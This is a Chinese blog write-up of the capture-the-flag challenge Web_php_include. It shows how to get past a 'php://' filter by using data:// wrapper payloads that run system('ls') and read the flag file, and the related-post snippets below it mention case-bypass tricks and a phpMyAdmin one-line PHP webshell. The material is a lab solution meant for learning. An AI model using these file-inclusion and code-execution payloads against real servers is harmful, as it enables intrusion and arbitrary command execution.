Web_php_include 攻防世界 wp

于 2024-03-29 19:45:42 发布
阅读量287 收藏 1
点赞数 8
分类专栏: web 文章标签: php web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jwkaaaaaa/article/details/137154719
版权
本文介绍了如何通过利用PHP中的文件包含漏洞,使用data伪协议构造payload,成功获取服务器上特定文件(flag),展示了渗透测试中的一种技术手段。
摘要由CSDN通过智能技术生成

1.打开后如下图所示:

看一下代码,发现需要利用文件包含漏洞。参数是page,但是要注意其中的str_replace(“php://”,””,$page)。这会将page中的”php://”替代成空格,也就是过滤”php://”。所以我们可以直接选择不用”php://”。

2.先试一下data伪协议,data://text/plain,<?php phpinfo();?>

发现出现了phpinfo.php。因此data伪协议可行。

3.构造payload,?page=data://text/plain,<?php system("ls")?>

出现了当前目录下文件,猜测其中的fl4gisisish3r3.php为我们想要的flag。

4.构造payload。?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>

由于php文件不会直接显示出来,因此查看源代码即可。

得到flag

flag="ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}"

流星划过小凯
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
等风来
05-22 9654
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
Web_php_include总结五种解法大同小异
yingyugo的博客
11-18 3356
Web_php_include解题详解 ————一念既出,万山无阻 分析——解题——总结 1.分析 代码不长,咱们慢慢分析 第一句是语法高亮,show_source() 函数对文件进行语法高亮显示。 本函数是 highlight_file() 的别名。 第二句是get 传给hello参数这里可以构造payload: /?hel
Web_php_include
怪味巧克力的博客
05-25 4231
知识点: 1.strstr(): 定义和用法: strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。 该函数是区分大小写的, stristr() 函数不区分大小写。 语法 strstr(string,search,before_search) 参数 描述 string 必需。规定被搜索的字符串。 search 必需。规定要搜索的字符串。如果该参数是数字,则搜索匹配该数字对应的 ASCII 值的字符。 before_searc
WEBWeb_php_include(多解)
最新发布
sleepywin的博客
07-16 1156
解题
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4440
ctf学习记录
攻防世界 Web_php_include 解题思路
xj28555的博客
07-07 4179
进入题目 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 当然这题有多种解法,我这里就讲述三种。 第一种 绕过str_replace函数,对渗透测试有点了解的都知道str_replace这个函数及其不安全,可以利用大小写绕过,双写绕过等,这里我用
php allow_url_include的应用和解释
10-29
PHP常常因为它可能允许URLS被导入和执行语句被人们指责。事实上,这件事情并不是很让人感到惊奇,因为这是导致称为Remote URL Include vulnerabilities的php应用程序漏洞的最重要的原因之一。
PHP include_path设置技巧分享
10-28
当时候函数include(),require(),fopen_with_path()...在不设置include_path的情况下,这些函数打开文件时候默认的是以web根目录去寻找.当设置include_path以后,这些php函数就会先在指定的include_path目录下面去搜索寻找
php set_include_path函数设置 include_path 配置选项
10-21
`set_include_path` 是 PHP 中的一个内置函数,用于在运行时动态修改 PHP 的 `include_path` 配置。`include_path` 是一个特殊路径列表,PHP 使用它来查找要包含的文件(如类库、头文件等)。当使用 `require`、`...
VB.rar_include称为_vb include_vb里 include
09-24
include称为文件包含命令扩展名为.h的文件也称为头文件或首部文件 定义两个实数变量,以被后面程序使用 显示提示信息 从键盘获得一个实数x 求x的正弦,并把它赋给变量s 显示程序运算结果 main函数结束
XCTF-高手进阶区:Web_php_include
1stPeak's Blog
03-02 558
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 看源码,可能是不想让我们使用php://in...
攻防世界(高手进阶区)——Web_php_include
知足且坚定,温柔且上进
02-11 1776
做完此题后参考了其他大佬写的wp,发现方法不同,此题我才用的是通过一句话木马注入。 使用御剑扫一下目录: 发现熟悉的http://111.198.29.45:53486/phpmyadmin/,打开链接: 一般username与password都为root,但此题的username为root,密码为空; 在SQL处写入一句话木马和文件包含: select "<?php eval(@$_P...
攻防世界 Web_php_include write up
giaogiao123的博客
02-19 304
首先看题目注意两点 1要get方式提交page 2要绕过strstr()函数,要绕过str_replace函数因为他会把php://换成空 3文件包含(要想到一句话木马) 先补充一些知识关于php://input 因为strstr是对大小写敏感的,用大写PHP绕过检测,同时绕过str_replace函数 strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是...
[wp] 攻防世界 Web_php_include
MercyLin的博客
09-28 6803
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr是对大小写敏感的,用大写PHP绕过...
Web_php_include(攻防世界)
赶不上早饭的博客
10-07 1692
Web_php_include 正文 打开链接是一串php代码 <?php show_source(__FILE__); //语法高亮,基本没利用点 echo $_GET['hello']; //输出传参hello,因该是给我们用来判定是否传入数据成功 $page=$_GET['page']; //将get到的page值赋给$page while (strstr($page, "php://")) { //当我传入PHp://时函数是没有检测到,返回false那么循环语句里面的都不执行。
攻防世界-Web_php_include [文件包含]
weixin_53146913的博客
04-15 539
意思是当传给page的参数里有php://时,会自动过滤掉,但是此函数对大小写敏感,构造Php://就不起作用了,而stristr()函数对大小写不敏感噢。 一、双写、大小写绕过: 大小写可直接绕过。 但是由于源代码中是while循环过滤,所以我们的双写过滤就G了QAQ。 二、利用hello的回显 我们构造payload,首先要构造hello这个参数我们必须先让传进的page参数为真 page参数用http伪协议访问127.0.0.1这个条件肯定为真 payload: ?pa.
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 450
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
web_php_include
he_stand的博客
10-18 265
web_php_include 代码审计 strstr()函数搜索字符串在另一字符串中是否存在,如果是,则返回str1字符串在str2第一次出现的位置,否则返回false。 str_replace()函数将参数中含php://替换为空 解题思路 第一种 因为不能利用php伪协议,可以利用其它伪协议。 data://也可以让用户控制输入流 此时的前提条件必须为allow_url_fopen和allow_url_include为on状态 第二种 strstr()函数对大小写不敏感,可以大写绕过 知识点
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值